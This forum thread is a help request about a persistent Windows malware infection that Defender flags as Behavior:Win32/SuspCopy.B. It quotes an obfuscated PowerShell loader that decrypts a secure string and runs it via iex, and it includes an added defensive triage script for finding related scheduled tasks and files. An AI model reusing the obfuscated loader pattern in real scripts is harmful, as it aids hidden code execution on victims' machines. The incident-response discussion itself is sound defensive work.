Microsoft Tech Community

Need help with suspicious "Behavior:Win32/SuspCopy.B"



The system of a colleague is trying to block various attempts of the threat classified as "Behavior:Win32/SuspCopy.B"; I found that the antivirus blocks it but after some time it finds it again; the threat creates a random directory under the path C:\Users\[my colleague account]\AppData\Roaming; if I try, I can delete the files inside but not the directory; as a side effect, every time that the antivirus finds a new attempt, a pop-up shows that a particular .tmp file is not found: the pop-up is a WSH pop-up and I suppose a VBScript is executed when there is this issue.

One of the files that I have found is a PowerShell script like this:


$kJzClF="pGCbAoRKiYYwsyNMeGECrJorQrjClQsjjShbNHddeVmNKUleMplzOrlXvLi" -replace "QMO|GCbA|RKiYY|syNM|GECrJo|QrjClQ|jjS|bNHdd|VmNKU|eMplzOr|XvLi";
$NJeDKxLmAJtftkbNcthp=Get-WmiObject win32_process -Filter "name=""powershell.exe""" | where {$_.CommandLine -match "iXxpLQjg"};
if ($NJeDKxLmAJtftkbNcthp[1] -eq $null){
$FJZARstrPhaUvJ= Get-Content ""
$BkbxfgOkWGcdUJu= ConvertTo-SecureString $FJZARstrPhaUvJ -key $pAWzZWnnbaODWSIlGcI;
$qOXGbSpmuvBSmvlkW = $wXXale::SecureStringToBSTR($BkbxfgOkWGcdUJu);
$zApeVzJjF = $wXXale::PtrToStringAuto($qOXGbSpmuvBSmvlkW);
$zApeVzJjF -replace "MJqsMVgvkpp" | iex;}}

I also tried to do a scan with Microsoft Security Scanner but without success.

Does anyone have any idea how I could eradicate this threat?




5 Replies
Interesting, does your colleague know the source of the script? Are you able to quarantine the file from the Defender ATP console?

Hello @rs8091 

No, my colleague doesn't know how her system got infected. We activated the preview of Microsoft Defender Endpoint P1 and I can see this:


[Image: Threat 1.png] [Image: Threat 2.png]

These are not generated by that file, but I have seen that in many random directories that the threat creates there is always a PowerShell file with that code inside.

I don't know if I can quarantine it.

Any help is appreciated.



Hello @rs8091 


Thanks for your reply. I've seen the link and also our dashboard, but I don't see the possibility; we have activated the preview of Microsoft 365 Defender for Endpoint P1, I d.

I also see that the script that I copied on this forum is not seen in the alert tree.


From what I see today, on my colleague's C:\Users\[colleague_account]\AppData\Roaming there is a directory "obUwHjQXC" that has the following files, as in the image:


[Image: Threat 3.png]

I also see that every 30/60 minutes the svchost.temp is refreshed; also, I suppose that when Defender recognizes the infection, the virus is blocked and so the dialog in the image appears:


[Image: Threat 4.png]

I tried to create the directory and the file again, even if empty because I don't know the contents of the .tmp file; after some time I checked and saw that the recreated file remains empty and the dialog when the problem shows again is this:


[Image: Threat 6.png]

Another thing that I noticed in past days is that the files 0_[something].log and 1_[something].log change every day: yesterday there was Teams, the day before Chrome.

This is what I see on the endpoint; instead, what I see in the alerts on the Defender dashboard is something like this in the picture (note that it seems that sometimes the virus uses bitsadmin.exe to transfer data, I don't know where):


[Image: Threat 5.png]

The time is the same that I find on the PC. I also found many, many entries in Task Scheduler: I have now deactivated all the ones that I suppose are related to the threat, but I can't see anything that can help me understand what starts the virus.


[Image: Threat 8.png]

I hope this helps to understand the problem better.


Thanks a lot.
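As an added triage example (not code from this thread or from Microsoft), the following PowerShell script enumerates on the affected host the indicators described in the posts above: scheduled tasks that launch script hosts or bitsadmin or point into AppData\Roaming, Roaming subdirectories holding the reported file types, and .ps1 files matching the obfuscation pattern of the posted script. It assumes an elevated session on the affected machine; the path and indicator strings are taken from the posts, and the output is meant for review in the Defender console before anything is deleted.

```powershell
# Added triage example (not from the thread): list the persistence and
# artefacts described above so they can be reviewed before removal.
# Assumptions: elevated PowerShell on the affected host; indicator strings
# (Roaming path, svchost.temp, 0_/1_ logs, bitsadmin) come from the posts.

$roaming = [Environment]::GetFolderPath('ApplicationData')   # C:\Users\<user>\AppData\Roaming

# 1. Scheduled tasks whose action launches a script host or bitsadmin,
#    or points into AppData\Roaming (the thread reports many such tasks).
$suspectTasks = Get-ScheduledTask | ForEach-Object {
    $task = $_
    foreach ($a in $task.Actions) {
        $cmd = "$($a.Execute) $($a.Arguments)"
        if ($cmd -match 'powershell|wscript|cscript|bitsadmin|AppData\\Roaming') {
            [pscustomobject]@{
                Task    = "$($task.TaskPath)$($task.TaskName)"
                State   = $task.State
                Command = $cmd
            }
        }
    }
}

# 2. Directories directly under Roaming that contain the file types seen in
#    the thread (.ps1, .vbs, .tmp, svchost.temp, 0_*.log / 1_*.log).
$suspectDirs = Get-ChildItem -Path $roaming -Directory -ErrorAction SilentlyContinue |
    Where-Object {
        Get-ChildItem -Path $_.FullName -File -ErrorAction SilentlyContinue |
            Where-Object { $_.Name -match '\.(ps1|vbs|tmp)$|^svchost\.temp$|^[01]_.*\.log$' }
    }

# 3. PowerShell files matching the obfuscation pattern of the posted script:
#    ConvertTo-SecureString / PtrToStringAuto feeding Invoke-Expression.
$suspectScripts = Get-ChildItem -Path $roaming -Recurse -Filter '*.ps1' -ErrorAction SilentlyContinue |
    Where-Object {
        $text = Get-Content -Path $_.FullName -Raw -ErrorAction SilentlyContinue
        ($text -match 'ConvertTo-SecureString') -and ($text -match 'PtrToStringAuto') -and
        ($text -match '\biex\b|Invoke-Expression')
    }

# Report only; quarantine through the Defender console so the persistence
# source (the task that recreates the directory) is not lost with the evidence.
"== Scheduled tasks referencing script hosts, bitsadmin or Roaming =="
$suspectTasks | Format-Table -AutoSize
"== Roaming directories containing the observed artefact types =="
$suspectDirs | Select-Object FullName, LastWriteTime | Format-Table -AutoSize
"== Scripts matching the posted obfuscation pattern =="
$suspectScripts | Select-Object FullName, Length, LastWriteTime | Format-Table -AutoSize
```

Disabled tasks are still listed (see the State column), which helps confirm whether the deactivated entries mentioned above cover every task that re-creates the directory.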



Hello Marco,
If you click on the events in the ATP console (4th picture), a panel should open on the right with options on how to remediate/block/quarantine the files. Is it available?